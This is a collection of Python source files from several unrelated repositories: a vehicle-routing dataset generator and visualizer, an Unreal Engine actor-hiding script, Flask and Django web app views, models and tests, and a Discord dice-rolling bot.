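        # so the first 2 samplers contribute 2 instances each and the last 2 contribute 3.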
smp = []
for i in range(self.num_samplers):
smp += self._sample(i, n_per_sampler-1 if i < num_trunc else n_per_sampler, graph_size)
return smp
def _sample(self, i: int, sample_size: int, graph_size: int = 100):
sampler = self.samplers[i]
return [sampler.sample(size=graph_size) for _ in range(sample_size)]
@staticmethod
def load_dataset(cfg: Dict,
filename: Optional[str] = None,
offset: int = 0,
limit: Optional[int] = None,
**kwargs):
"""Load data from file."""
f_ext = os.path.splitext(filename)[1]
assert f_ext in ['.pkl', '.dat', '.pt']
filepath = os.path.normpath(os.path.expanduser(filename))
logger.info(f"Loading dataset from: {filepath}")
try:
data = torch.load(filepath, **kwargs)
except RuntimeError:
# fall back to pickle loading
assert os.path.splitext(filepath)[1] == '.pkl', "Can only load pickled datasets."
with open(filepath, 'rb') as f:
data = pickle.load(f, **kwargs)
# select instances specified in cfg
instances = []
for grp in cfg['groups']:
for typ in cfg['types']:
for twf in cfg['tw_fracs']:
instances.append(data[f"{grp}{typ}"][f"tw_frac={twf}"])
data = list(it.chain.from_iterable(instances))
if limit is not None and len(data) != (limit-offset):
assert isinstance(data, List) or isinstance(data, np.ndarray), \
f"To apply limit the data has to be of type <List> or <np.ndarray>."
if len(data) < limit:
warn(f"Provided data size limit={limit} but limit is larger than data size={len(data)}.")
logger.info(f"Specified offset={offset} and limit={limit}. "
f"Loading reduced dataset of size={limit-offset}.")
return data[offset:limit]
else:
return data
@staticmethod
def save_dataset(dataset: Union[List, np.ndarray],
filepath: str,
**kwargs):
"""Saves data set to file path"""
filepath = format_ds_save_path(filepath, **kwargs)
# create directory if it doesn't exist
os.makedirs(os.path.dirname(filepath), exist_ok=True)
logger.info(f"Saving dataset to: {filepath}")
try:
torch.save(dataset, filepath)
except RuntimeError:
# fall back to pickle save
assert os.path.splitext(filepath)[1] == '.pkl', "Can only save as pickle. Please add extension '.pkl'!"
with open(filepath, 'wb') as f:
pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL)
return str(filepath)
class RPDataset(Dataset):
"""Routing problem dataset wrapper."""
def __init__(self,
cfg: Dict,
data_pth: str = None,
stats_pth: str = None,
seed: int = None,
**kwargs):
"""
Args:
cfg: config of solomon stats to use for sampling
data_pth: file path to load dataset
stats_pth: file path to load solomon stats
seed: seed for random generator
**kwargs: additional kwargs for the generator
"""
super(RPDataset, self).__init__()
self.cfg = cfg
self.data_pth = data_pth
self.gen = None
if data_pth is not None:
logger.info(f"provided dataset {data_pth}, so no new samples are generated.")
elif stats_pth is not None:
self.gen = RPGenerator(sample_cfg=cfg, stats_file_path=stats_pth, seed=seed)
else:
RuntimeError(f"Need to specify either 'data_pth' or 'sample_cfg'.")
self.size = None
self.data = None
def seed(self, seed: int):
if self.gen is not None:
self.gen.seed(seed)
def load_ds(self, limit: Optional[int] = None, **kwargs):
"""Simply load dataset from data_path specified on init."""
assert self.data_pth is not None
self.data = RPGenerator.load_dataset(filename=self.data_pth,
limit=limit,
cfg=self.cfg,
**kwargs)
self.size = len(self.data)
def sample(self, sample_size: int = 10000, graph_size: int = 100, **kwargs):
"""Loads fixed dataset if filename was provided else
samples a new dataset based on specified config."""
if self.data_pth is not None: # load data
self.data = RPGenerator.load_dataset(filename=self.data_pth,
limit=sample_size,
cfg=self.cfg,
**kwargs)
else:
self.data = self.gen.generate(
sample_size=sample_size,
graph_size=graph_size,
**kwargs
)
self.size = len(self.data)
return self
def __len__(self):
return self.size
def __getitem__(self, idx):
return self.data[idx]
# ============= #
# ### TEST #### #
# ============= #
def _test1():
SAMPLE_CFG = {"groups": GROUPS, "types": TYPES, "tw_fracs": TW_FRACS}
LPATH = "./solomon_stats.pkl"
with open(LPATH, 'rb') as f:
dset_cfg = pickle.load(f)
cfgs = []
for grp in SAMPLE_CFG['groups']:
for typ in SAMPLE_CFG['types']:
for twf in SAMPLE_CFG['tw_fracs']:
cfgs.append(dset_cfg[grp][f"{grp}{typ}"][f"tw_frac={twf}"])
cfgs = list(it.chain.from_iterable(cfgs))
for cfg in cfgs:
sampler = InstanceSampler(cfg)
sampler.seed(123)
for _ in range(100):
sampler.sample(100)
return True
def _test2():
SAMPLE_CFG = {"groups": GROUPS, "types": TYPES, "tw_fracs": TW_FRACS}
LPATH = "./solomon_stats.pkl"
BS = 512
N = 100
gen = RPGenerator(sample_cfg=SAMPLE_CFG, stats_file_path=LPATH)
gen.seed(123)
data = gen.generate(BS, N)
# for d in data:
# print(d.coords[0])
assert len(data) == BS
return True
def _test3():
SAMPLE_CFG = {"groups": GROUPS, "types": TYPES, "tw_fracs": TW_FRACS}
LPATH = "./solomon_stats.pkl"
BS = 512
N = 100
ds = RPDataset(cfg=SAMPLE_CFG, stats_pth=LPATH)
ds.seed(123)
data = ds.sample(sample_size=BS, graph_size=N)
assert len(data) == BS
return True
```
#### File: lib/routing/visualization.py
```python
import os
import logging
from typing import Optional, Dict
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from matplotlib.animation import ImageMagickWriter
import torch
# configure matplotlib logger
logging.getLogger("matplotlib").setLevel(logging.WARNING)
if "PYCHARM_HOSTED" in os.environ:
matplotlib.use("TKAgg") # for use with GUI/IDE
class Viewer:
"""Renders routing environment by plotting changes of routing edges for each step."""
def __init__(self,
locs: np.ndarray,
save_dir: Optional[str] = None,
as_gif: bool = True,
gif_naming: Optional[str] = None,
**kwargs):
self.locs = locs
self.save_dir = os.path.join(save_dir, "gifs") if save_dir is not None else None
self.as_gif = as_gif
if self.as_gif:
matplotlib.use("Agg") # for saving stream to file
self.edges = None
self.writer = None
self.cmap = plt.get_cmap("tab20")
plt.ion()
# scale arrow sizes by plot scale, indicated by max distance from center
max_dist_from_zero = np.max(np.abs(locs))
self.hw = max_dist_from_zero * 0.02
self.hl = self.hw * 1.25
# create figure objects
self.fig, self.ax = plt.subplots()
self.plot_locs(self.locs, **kwargs)
if save_dir is not None:
os.makedirs(self.save_dir, exist_ok=True)
if not self.as_gif:
plt.show(block=False)
else:
assert save_dir is not None, f"Must specify save_dir to create gif."
metadata = dict(title='routing_env_render', artist='Matplotlib', comment='matplotlib2gif')
self.writer = ImageMagickWriter(fps=2, metadata=metadata)
if gif_naming is None:
gif_naming = f"render.gif"
if gif_naming[-4:] != ".gif":
gif_naming += ".gif"
outfile = os.path.join(self.save_dir, gif_naming)
self.writer.setup(fig=self.fig, outfile=outfile)
def plot_locs(self, locs: np.ndarray, add_idx: bool = True, **kwargs):
# scatter plot of locations
self.ax.scatter(locs[:, 0], locs[:, 1], c='k')
self.ax.scatter(locs[0, 0], locs[0, 1], c='r', s=7 ** 2, marker='s') # depot/start node
if add_idx:
# add node indices
for i in range(1, locs.shape[0]):
self.ax.annotate(i, (locs[i, 0], locs[i, 1]),
xytext=(locs[i, 0]+0.012, locs[i, 1]+0.012),
fontsize='medium', fontweight='roman')
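# Usage sketch for the update() method below (illustrative, not part of the original
# module): for a TSP-style solution, buffer["edges"] is a single (2, n_edges) array of
# node-index pairs; for multi-tour problems it is a list of such arrays, one per tour.
#   viewer = Viewer(locs)                               # locs: (n, 2) coordinates
#   viewer.update(buffer={"edges": edges}, cost=12.3, n_iters=1)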
def update(self,
buffer: Dict,
cost: float,
n_iters: Optional[int] = None,
pause_sec: float = 0.5,
new_locs: Optional[np.ndarray] = None,
**kwargs):
"""Update current dynamic figure.
Args:
buffer: dictionary of data to plot
cost: cost of current solution
n_iters: current iteration
pause_sec: float specifying seconds to wait before updating figure
new_locs: optional new locations
"""
if new_locs is not None:
self.plot_locs(new_locs, **kwargs)
[p.remove() for p in self.ax.patches] # remove all previous patches
num_tours = 0
if 'edges' in buffer.keys():
edges = buffer['edges']
if isinstance(edges, np.ndarray): # TSP
edges = [edges]
num_tours = len(edges)
if num_tours > self.cmap.N:
self.cmap = plt.get_cmap('jet', len(edges))
for i, r in enumerate(edges):
assert len(r.shape) == 2 and r.shape[0] == 2
self._draw_edges(edges=r, color=self.cmap(i))
elif 'tours' in buffer.keys():
tours = buffer['tours']
raise NotImplementedError
else:
raise ValueError("No 'edges' or 'tours' found in buffer.")
iter_str = f"Iter: {n_iters}, " if n_iters is not None else ''
self.ax.set_title(f"{iter_str}cost: {cost:.4f}, k: {num_tours}")
self.ax.set_aspect('equal', adjustable='box')
self._flush(pause_sec, **kwargs)
def _flush(self, pause_sec: float = 0.1, **kwargs):
self.fig.canvas.draw()
self.fig.canvas.flush_events()
if self.as_gif and self.writer is not None:
self.writer.grab_frame(**kwargs)
else:
plt.pause(pause_sec)
def _draw_edges(self, edges: np.ndarray, color: str = "b", **kwargs):
coords = self.locs[edges]
X = coords[0, :, 0]
Y = coords[0, :, 1]
dX = coords[1, :, 0] - X
dY = coords[1, :, 1] - Y
for x, y, dx, dy in zip(X, Y, dX, dY):
self.ax.arrow(x, y, dx, dy,
color=color,
linestyle='-',
head_width=self.hw,
head_length=self.hl,
length_includes_head=True,
**kwargs)
def render_rgb(self) -> np.ndarray:
"""Returns the current figure as RGB value numpy array."""
return np.frombuffer(self.fig.canvas.tostring_rgb(), dtype=np.uint8)\
.reshape(self.fig.canvas.get_width_height()[::-1] + (3,))
def save(self, path: Optional[str] = None):
"""Save the current figure on specified path. If path is None, uses default save_dir."""
if self.as_gif:
self.writer.finish()
outfile = path if path is not None else os.path.join(self.save_dir, "final.gif")
self.writer.saving(fig=self.fig, outfile=outfile, dpi=120)
return True
return False
def close(self):
"""Finish and clean up figure and writer processing."""
plt.clf()
plt.close('all')
plt.ioff()
#
# ============= #
# ### TEST #### #
# ============= #
def _test():
from torch.utils.data import DataLoader
from lib.routing import RPDataset, RPEnv, GROUPS, TYPES, TW_FRACS
#SAMPLE_CFG = {"groups": GROUPS, "types": TYPES, "tw_fracs": TW_FRACS}
SAMPLE_CFG = {"groups": ['r'], "types": [1], "tw_fracs": [1.0]}
LPATH = "./solomon_stats.pkl"
SMP = 32
N = 100
BS = 16
BS_ = BS
MAX_CON = 5
CUDA = False
SEED = 123
POMO = False #True
N_POMO = 8
if POMO:
BS_ = BS // N_POMO
GIF = False
device = torch.device("cuda" if CUDA else "cpu")
ds = RPDataset(cfg=SAMPLE_CFG, stats_pth=LPATH)
ds.seed(SEED)
data = ds.sample(sample_size=SMP, graph_size=N)
dl = DataLoader(
data,
batch_size=BS_,
collate_fn=lambda x: x, # identity -> returning simple list of instances
shuffle=False
)
env = RPEnv(debug=True,
device=device,
max_concurrent_vehicles=MAX_CON,
k_nbh_frac=0.4,
pomo=POMO,
num_samples=N_POMO,
enable_render=True,
plot_save_dir="./PLOTS" if GIF else None,
)
env.seed(SEED + 1)
for batch in dl:
env.load_data(batch)
obs = env.reset()
done = False
i = 0
start_tws = env._stack_to_tensor(batch, "tw")[:, :, 1]
# print(env.coords[:, 0])
while not done:
# print(i)
# select tour randomly and then select available node with earliest TW
tr = torch.randint(MAX_CON, size=(BS,), device=device)
t_nbh = obs.nbh[torch.arange(BS), tr]
t_msk = obs.nbh_mask[torch.arange(BS), tr]
nd = torch.zeros(BS, dtype=torch.long, device=device)
for j, (nbh, msk, start_tw) in enumerate(zip(t_nbh, t_msk, start_tws)):
available_idx = nbh[~msk] # mask is True where infeasible
idx = available_idx[start_tw[available_idx].argsort(-1, descending=False)]
nd[j] = idx[0]
# step
obs, rew, done, info = env.step(torch.stack((tr, nd), dim=-1))
env.render(as_gif=GIF, pause_sec=0.3)
i += 1
# print(info)
``` |
{
"source": "JoKontage/UnrealScripts",
"score": 2
} |
#### File: JoKontage/UnrealScripts/hide-actors.py
```python
from collections import Counter, defaultdict, OrderedDict
import unreal
import re
import traceback
import os
import json
import csv
import posixpath
import math
from glob import glob
# This is the SCALE / 100 which we set in HammUEr when importing models.
# Source maps are bigger than Sandstorm for whatever reason --
# so we've had to scale things down a bit.
# We *need* this scale to be accurate or the placement of
# objects will be *waaaaay* off if we go by the Origin in
# our imported notes. When spawning an item at the Origin defined
# by an imported note (IE: for nbot_cover notes), we need to
# divide each value (Y, X, Z) by this HAMMUER_SCALE
#
# FYI, the ridiculous number below was found by dividing the location
# specified in a Note actor (IE: 319.99) to the same HammUEr-translated
# point value (IE: 736.116821) in that same object.
# ( *sigh* I hate floats... )
HAMMUER_SCALE = 0.4347000243321434
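# Illustrative sketch (not part of the original script) of how the scale above is
# applied when spawning at a Note origin: divide each coordinate by HAMMUER_SCALE.
# The helper name is hypothetical; the figures come from the comment above
# (319.99 / HAMMUER_SCALE ~= 736.1168):
#   def scale_note_origin(origin):  # origin = (Y, X, Z) in Source units
#       return tuple(v / HAMMUER_SCALE for v in origin)
#   scale_note_origin((319.99, 0.0, 0.0))  # -> (~736.12, 0.0, 0.0)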
# REQUIRED! We use the values found in the map.txt files for
# placement of objectives, spawns, ...
GCFSCAPE_EXPORT_DIRECTORY = r"C:\Modding\Source\scripts\exports\doi"
BSPSRC_EXPORT_DIRECTORY = r"C:\Modding\Source\scripts\decompiled_maps"
# Regex for VMF parsing
PLANE_SPLIT_RE = re.compile(r'\((.+?)\)')
ARRAY_RE = re.compile(r'([-0-9.]+)')
THREE_NUM_STR_RE = re.compile(r'^[-0-9.]+ [-0-9.]+ [-0-9.]+$')
# A set of actor labels to use for ensuring we
# don't place the same actor multiple times
PLACED_ACTORS = set()
# Shortcuts for creating material node connections
CREATE_EXPRESSION = unreal.MaterialEditingLibrary.create_material_expression
CREATE_CONNECTION = unreal.MaterialEditingLibrary.connect_material_expressions
CONNECT_PROPERTY = unreal.MaterialEditingLibrary.connect_material_property
CONNECT_EXPRESSIONS = unreal.MaterialEditingLibrary.connect_material_expressions
# Use to create material node connections
CHILD_OBJECT_REGEX = re.compile(r".*_\d{3}$")
def isnumeric(value):
try:
float(value)
return True
except:
return False
def num_to_alpha(num):
""" Convert a number between 0 and 24 (inclusive) into its alphabetic equivalent """
num = int(num) # Ensure num is an int
if num < 0:
raise ValueError("wtf? num_to_alpha doesn't like numbers less than 0...")
if num > 24:
raise ValueError("seriously? there's no way you have more than 24 objectives...")
return chr(65 + num)
def get_snake_case(text):
# If world_name contains CamelCase lettering, add an _
# before each uppercase letter following the first letter
# TODO: This is a stupid way to do this, right? *Maybe* fix it .. but ... it *does* work ...
text = "".join(reversed([c if c.islower() else "_%s" % c for c in reversed(text)]))
# If world_name has a leading underscore, remove it
text = text[1:] if text[0] == "_" else text
# Ensure world_name is lowercase
return text.lower()
def cast(object_to_cast=None, object_class=None):
"""
# object_to_cast: obj unreal.Object : The object you want to cast
# object_class: obj unreal.Class : The class you want to cast the object into
"""
try:
return object_class.cast(object_to_cast)
except Exception:
return None
def get_all_properties(unreal_class=None):
"""
# Note: Also work using the command : help(unreal.StaticMesh)
# unreal_class: obj : The class you want to know the properties
# return: str List : The available properties (formatted the way you can directly use them to get their values)
"""
return unreal.CppLib.get_all_properties(unreal_class)
def get_all_actors(use_selection=False, actor_class=None, actor_tag=None, world=None):
"""
# use_selection: bool : True if you want to get only the selected actors
# actor_class: class unreal.Actor : The class used to filter the actors. Can be None if you do not want to use this filter
# actor_tag: str : The tag used to filter the actors. Can be None if you do not want to use this filter
# world: obj unreal.World : The world you want to get the actors from. If None, will get the actors from the currently open world.
# return: obj List unreal.Actor : The actors
"""
world = world if world is not None else unreal.EditorLevelLibrary.get_editor_world() # Make sure to have a valid world
if use_selection:
selected_actors = get_selected_actors()
class_actors = selected_actors
if actor_class:
class_actors = [x for x in selected_actors if cast(x, actor_class)]
tag_actors = class_actors
if actor_tag:
tag_actors = [x for x in selected_actors if x.actor_has_tag(actor_tag)]
return [x for x in tag_actors]
elif actor_class:
actors = unreal.GameplayStatics.get_all_actors_of_class(world, actor_class)
tag_actors = actors
if actor_tag:
tag_actors = [x for x in actors if x.actor_has_tag(actor_tag)]
return [x for x in tag_actors]
elif actor_tag:
tag_actors = unreal.GameplayStatics.get_all_actors_with_tag(world, actor_tag)
return [x for x in tag_actors]
else:
actors = unreal.GameplayStatics.get_all_actors_of_class(world, unreal.Actor)
return [x for x in actors]
def select_actors(actors_to_select=[]):
"""
# Note: Will always clear the selection before selecting.
# actors_to_select: obj List unreal.Actor : The actors to select.
"""
unreal.EditorLevelLibrary.set_selected_level_actors(actors_to_select)
def get_selected_actors():
""" return: obj List unreal.Actor : The selected actors in the world """
return unreal.EditorLevelLibrary.get_selected_level_actors()
def actor_contains_material(actor, material_name, containing=False):
""" If this actor is a StaticMeshActor and has a material whose name
starts with the provided material_name (or contains it when containing=True),
return True -- else return False
"""
if not material_name:
return False
if isinstance(actor, unreal.StaticMeshActor):
static_mesh_component = actor.get_component_by_class(unreal.StaticMeshComponent)
# Skip if there's no static mesh to display
if not static_mesh_component.static_mesh:
return False
# Check if the static mesh has materials -- which we'll fix if applicable
mats = static_mesh_component.get_materials()
if not mats:
return False
# Iterate through all materials found in this static mesh
for mat in mats:
if not mat:
continue
# Check if the name of the current material starts with "tools"
mat_name = mat.get_name()
if not mat_name:
continue
if mat_name.startswith(material_name) or (containing and material_name in mat_name):
return True
# Actor wasn't a StaticMesh -- so we couldn't be sure
# it was a tool. Skip this actor ...
return False
def hide_all_actors_with_material_name(material_name, containing=True):
""" Hide all actors with the specified material (with Undo support) """
matching_actors = list()
with unreal.ScopedEditorTransaction("Hiding Actors (in-game) with Specific Mat") as trans:
# Find all actors with the specified material and add them
# to the "matching_actors" list.
for actor in get_all_actors(actor_class=unreal.StaticMeshActor):
if actor_contains_material(actor, material_name, containing=containing):
print(" - hiding actor: %s" % actor.get_name())
# Hide this specified actor in-game
actor.set_actor_hidden_in_game(True)
# Add this actor to our "matching_actors" list
matching_actors.append(actor)
return matching_actors
def move_actors_to_folder(actors, folder_name):
for actor in actors:
if not actor:
continue
try:
actor.set_folder_path(folder_name)
except Exception as ex:
print(ex)
def main():
# Hide all actors with a material name starting with "player_flesh_mat"
# and return a list of all matching actors
matching_actors = hide_all_actors_with_material_name("_flesh_", containing=True)
# Add all actors in the "actors_to_group" list to an Unreal group
with unreal.ScopedEditorTransaction("Group Mannequins"):
useless_actors_group = unreal.ActorGroupingUtils(name="Mannequins")
useless_actors_group.group_actors(matching_actors)
# Move actors to a folder called "Mannequins"
move_actors_to_folder(matching_actors, "Mannequins")
print("[*] We're done! Actors should be hidden in-game")
# Run main!
main()
``` |
{
"source": "J-Okoto/Blog-Quote",
"score": 3
} |
#### File: app/main/views.py
```python
import os
from flask import render_template,request, redirect, url_for, abort,flash
from . import main
from .forms import PostForm
from ..models import Post,Comment
from .. import db
from app.requests import getQuotes
from flask_login import login_required,current_user
# Views
@main.route('/')
def index():
'''
View root page function that returns the index page and its data
'''
quotes=getQuotes()
posts = Post.query.all()
title='Quotes Blog'
return render_template('index.html',title=title,quotes=quotes,posts=posts, current_user=current_user)
@main.route("/new_post", methods=['GET', 'POST'])
@login_required
def new_post():
form = PostForm()
if form.validate_on_submit():
post = Post(title=form.title.data, content=form.content.data,author=current_user)
post.save()
flash('Your post has been created!', 'success')
return redirect(url_for('main.index'))
return render_template('new_post.html', title='New Post',
form=form, legend='New Post')
@main.route("/post/<int:post_id>")
@login_required
def mypost(post_id):
comments = Comment.query.filter_by(post_id=post_id).all()
print(comments)
heading = 'comments'
post = Post.query.get_or_404(post_id)
return render_template('posts.html', title=post.title, post=post, comments=comments, heading=heading)
@main.route('/comment/<post_id>', methods=['POST', 'GET'])
def comment(post_id):
comment = request.form.get('newcomment')
new_comment = Comment(comment=comment, user_id=current_user._get_current_object().id, post_id=post_id)
new_comment.save()
return redirect(url_for('main.mypost', post_id=post_id))
``` |
{
"source": "Jokotoye18/DjangoEcommerce",
"score": 2
} |
#### File: core/templatetags/cart_template_tags.py
```python
from django import template
from core.models import Order
from django.contrib.sessions.models import Session
register = template.Library()
@register.filter
def cart_item_count(user):
if user.is_authenticated:
order_qs = Order.objects.filter(owner=user, is_ordered=False)
if order_qs.exists():
return order_qs[0].items.count()
return 0
``` |
{
"source": "Jokotoye18/Forum",
"score": 2
} |
#### File: boards/api/views.py
```python
from django.shortcuts import get_object_or_404
from django.contrib.auth import get_user_model
from accounts.models import Profile
from boards.models import Board, Topic, Post
from rest_framework.response import Response
from rest_framework.parsers import FormParser
from rest_framework.renderers import TemplateHTMLRenderer
from rest_framework import status
from rest_framework.reverse import reverse
from rest_framework.views import APIView
from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView, ListAPIView, RetrieveUpdateAPIView
from .serializers import BoardSerializer, TopicSerializer, PostSerializer, UserProfileSerializer
class BoardList(ListAPIView):
queryset = Board.objects.all()
serializer_class = BoardSerializer
filter_fields = [
'name',
]
search_fields = [
'name',
]
ordering_fields = [
'name',
]
class BoardDetail(RetrieveUpdateDestroyAPIView):
queryset = Board.objects.all()
serializer_class = BoardSerializer
lookup_field = 'slug'
class BoardTopicList(ListCreateAPIView):
serializer_class = TopicSerializer
lookup_field = 'board__slug'
def get_queryset(self):
queryset = Topic.objects.filter(board__slug=self.kwargs.get('slug'))
return queryset
def post(self, request, *args, **kwargs):
board = get_object_or_404(Board, slug=self.kwargs.get('slug'))
serializer = TopicSerializer(data=request.data)
if serializer.is_valid():
serializer.save(board=board, starter=request.user)
# Post.objects.create(
# topic=request.data.get('topic'),
# subject = request.data.get('subject'),
# created_by = request.user
# )
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class TopicPostList(APIView):
def get(self, request, *args, **kwargs):
subject = Post.objects.filter(topic__slug=self.kwargs.get('topic_slug')).first()
replies = Post.objects.filter(topic__slug=self.kwargs.get('topic_slug'))[1:]
if replies:
subject_serializer = PostSerializer(subject)
replies_serializer = PostSerializer(replies, many=True)
return Response({
'subject': subject_serializer.data,
'replies': replies_serializer.data
})
else:
subject_serializer = PostSerializer(subject)
return Response({
'subject': subject_serializer.data,
'replies': 'No reply yet!'
})
def post(self, request, *args, **kwargs):
topic = get_object_or_404(Topic, slug=self.kwargs.get('topic_slug'))
serializer = PostSerializer(data=request.data)
if serializer.is_valid():
serializer.save(topic=topic, created_by=request.user)
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class ProfileView(RetrieveUpdateAPIView):
serializer_class = UserProfileSerializer
queryset = Profile.objects.all()
lookup_field = 'user__username'
lookup_url_kwarg = 'username'
# def get(self, request, *args, **kwargs):
# profile = get_object_or_404(Profile, user__username=self.kwargs.get('username'))
# serializer = UserProfileSerializer(profile)
# return Response(serializer.data)
# def patch(self, request, *args, **kwargs):
# profile = get_object_or_404(Profile, user__username=self.kwargs.get('username'))
# serializer = UserProfileSerializer(profile, data=request.data)
# if serializer.is_valid():
# serializer.save()
# return Response(serializer.data, status=status.HTTP_201_CREATED)
# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
```
#### File: Forum/pages/views.py
```python
from django.shortcuts import render
from django.views.generic import View
from boards.models import Board
from allauth.account.views import password_change
class HomeView(View):
def get(self, *args, **kwargs):
boards = Board.objects.order_by('name')
context = {"board_list": boards}
return render(self.request, "home.html", context)
``` |
{
"source": "Jokotoye18/Learning_log",
"score": 2
} |
#### File: Learning_log/pages/tests.py
```python
from django.test import TestCase, SimpleTestCase
from django.urls import reverse
class HomepageTest(SimpleTestCase):
def test_homepage_status_code(self):
response = self.client.get('/')
self.assertEqual(response.status_code, 200)
def test_homepage_by_url_name(self):
response = self.client.get(reverse('pages:home'))
self.assertEqual(response.status_code, 200)
```
#### File: Learning_log/profiles/models.py
```python
from django.db import models
from allauth.account.forms import SignupForm
from django.contrib.auth import get_user_model
from allauth.account.signals import user_signed_up
class Profile(models.Model):
user = models.OneToOneField(get_user_model(), on_delete=models.CASCADE)
location = models.CharField(max_length=50, blank=True)
interest = models.CharField(max_length=240, blank=True)
about = models.TextField(blank=True)
def __str__(self):
return f"{self.user.username} profile"
User = get_user_model()
def user_signed_up_receiver(request, user, **kwargs):
if user_signed_up:
Profile.objects.create(user=user)
user_signed_up.connect(user_signed_up_receiver, sender=User)
```
#### File: Learning_log/profiles/tests.py
```python
from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from.models import Profile
from allauth.account.forms import SignupForm
from django.urls import reverse
class ProfileModelTest(TestCase):
def setUp(self):
self.user = get_user_model().objects.create_user(
email = '<EMAIL>',
username = 'testname'
)
self.profile = Profile.objects.create(
user = self.user,
location = 'ilorin',
interest = 'sport',
about = 'test about'
)
def test_profile_model_text_representation(self):
self.assertEqual(f'{self.profile}', f'{self.user.username} profile')
def test_profile_content(self):
self.assertEqual(f'{self.profile.user}', f'{self.user}')
self.assertEqual(f'{self.profile.location}', 'ilorin')
self.assertEqual(f'{self.profile.interest}', 'sport')
self.assertEqual(f'{self.profile.about}', 'test about')
class ProfileViewTest():
c = Client()
resp = c.get(reverse('profiles:profile'))
```
#### File: Learning_log/profiles/views.py
```python
from django.shortcuts import render, get_object_or_404, redirect
from django.views.generic import DetailView, View,UpdateView
from django.contrib.auth import get_user_model
from django.contrib import messages
from .models import Profile
from .forms import ProfileUpdateForm, UserForm
from django.contrib.auth.mixins import LoginRequiredMixin
class ProfileUpdateView(LoginRequiredMixin, View):
def get(self, request, *args, **kwargs):
form1 = UserForm(instance=request.user)
form2 = ProfileUpdateForm(instance=request.user.profile)
context = {'form1':form1, 'form2':form2}
return render(request, 'profiles/profile.html', context)
def post(self, request, *args, **kwargs):
form1 = UserForm(request.POST, instance=request.user)
form2 = ProfileUpdateForm(request.POST, instance=request.user.profile)
if form1.is_valid() and form2.is_valid():
form1.save()
form2.save()
messages.success(self.request, 'Your account has been updated successfully.')
return redirect("pages:home")
``` |
{
"source": "Jokotoye18/my-portfolio",
"score": 2
} |
#### File: portfolio/api/views.py
```python
from rest_framework.generics import ListAPIView, RetrieveUpdateDestroyAPIView, GenericAPIView, CreateAPIView
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from django.core.mail import send_mail
from django.conf import settings
from .serializers import PortfolioSerializer, ContactSerializer
from portfolio.models import Portfolio
class PortfolioList(ListAPIView):
serializer_class = PortfolioSerializer
queryset = Portfolio.objects.all()
class PortfolioDetail(RetrieveUpdateDestroyAPIView):
serializer_class = PortfolioSerializer
queryset = Portfolio.objects.all()
lookup_field = "slug"
class SendMail(GenericAPIView):
serializer_class = ContactSerializer
def post(self, request, *args, **kwargs ):
serializer = self.get_serializer(data=request.data)
if serializer.is_valid():
serializer.save()
to_email = '<EMAIL>'
sender_email = request.data['email']
name = request.data['name']
message = request.data['message']
subscribe_message = f'Hi <NAME>, {name} has contacted you from your portfolio saying \'{message}\'. You may want to reply to {sender_email}.'
subject = 'Contact message received'
from_email = settings.DEFAULT_FROM_EMAIL
to_email = [to_email]
send_mail(subject, subscribe_message, from_email, to_email, fail_silently=True)
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# serializer.is_valid(raise_exception=True)
# return Response(serializer.data, status=status.HTTP_201_CREATED)
``` |
{
"source": "Jokotoye18/todoapp",
"score": 3
} |
#### File: todoapp/tests/test_models.py
```python
from django.test import TestCase
from todoapp.models import Todo
from django.contrib.auth import get_user_model
class TodoModelTest(TestCase):
def setUp(self):
self.user = get_user_model().objects.create_user(
username = 'user_test',
email = '<EMAIL>',
password = '<PASSWORD>'
)
self.todo = Todo.objects.create(
owner = self.user,
title = 'Test title'
)
def test_todo_model_text_representation(self):
self.assertEqual(f'{self.todo}', 'Test title')
``` |
{
"source": "Jokotoye18/todo_drf",
"score": 3
} |
#### File: todo/tests/test_models.py
```python
from django.test import TestCase
from todo.models import Todo
from django.contrib.auth import get_user_model
class TodoModelTest(TestCase):
def setUp(self):
self.user = get_user_model().objects.create_user(
username = 'test_user',
email = '<EMAIL>'
)
self.todo = Todo.objects.create(
title = 'Test todo',
added_by = self.user
)
def test_todo_model_content(self):
todo = Todo.objects.get(pk=1)
todos = Todo.objects.count()
self.assertEqual(todos, 1)
self.assertEqual(f'{todo.title}', 'Test todo')
self.assertEqual(todo.added_by, self.user)
def test_todo_model_text_representation(self):
todo = Todo.objects.get(pk=1)
response = f'{todo}'
self.assertEqual(response, 'Test todo')
```
#### File: todo/tests/test_views.py
```python
from django.test import TestCase
from todo.models import Todo
from django.contrib.auth import get_user_model
class TodoViewsTest(TestCase):
def setUp(self):
self.user = get_user_model().objects.create_user(
username = 'test_user2',
email = '<EMAIL>'
)
self.todo = Todo.objects.create(
title = 'Test todo',
added_by = self.user
)
``` |
{
"source": "jokrey/discord-dice-bot",
"score": 3
} |
#### File: jokrey/discord-dice-bot/dice_bot.py
```python
import signal
import discord
import sys
from dice import parse_to_result_str # this is red in pycharm, but it works
if len(sys.argv) >= 2:
BOT_TOKEN = sys.argv[1]
else:
print("Enter Bot Token (you could have entered it as the first command line argument to this script):")
BOT_TOKEN = input()
print("Thanks. All required data for login available. Here we go...")
client = discord.Client()
@client.event
async def on_message(message):
if message.author == client.user: # disable self reply
return
accepted_help_commands = ['help']
accepted_dice_roll_commands = ['', 'würfel!', 'würfel', 'roll-the-dice', 'roll', 'dice', 'dnd']
split = message.content.split(" ",1)
command = split[0].lower()
args = split[1] if len(split) > 1 else ''
if command.startswith('!'):
command = command[1:]
if command in accepted_dice_roll_commands:
try:
result_str = parse_to_result_str(args)
await message.channel.send(result_str)
except Exception:
await message.channel.send('Thanks for trying {0.author.mention}, but that is just not something I can roll. Tried !help?'.format(message))
elif command in accepted_help_commands:
await message.channel.send('Hi {0.author.mention}, you can roll a dice using \"!dice <dice list>\".\n'
'Some possible dice are \"D6, D8, D10, D20\".\n'
'You can also roll multiple of the same dice at once using \"3xD20\"\n'
'Or different dice using \"D20, D2, D4\"\n'
'Also possible is to add a constant to a dice roll using for example \"D6+4\"\n'
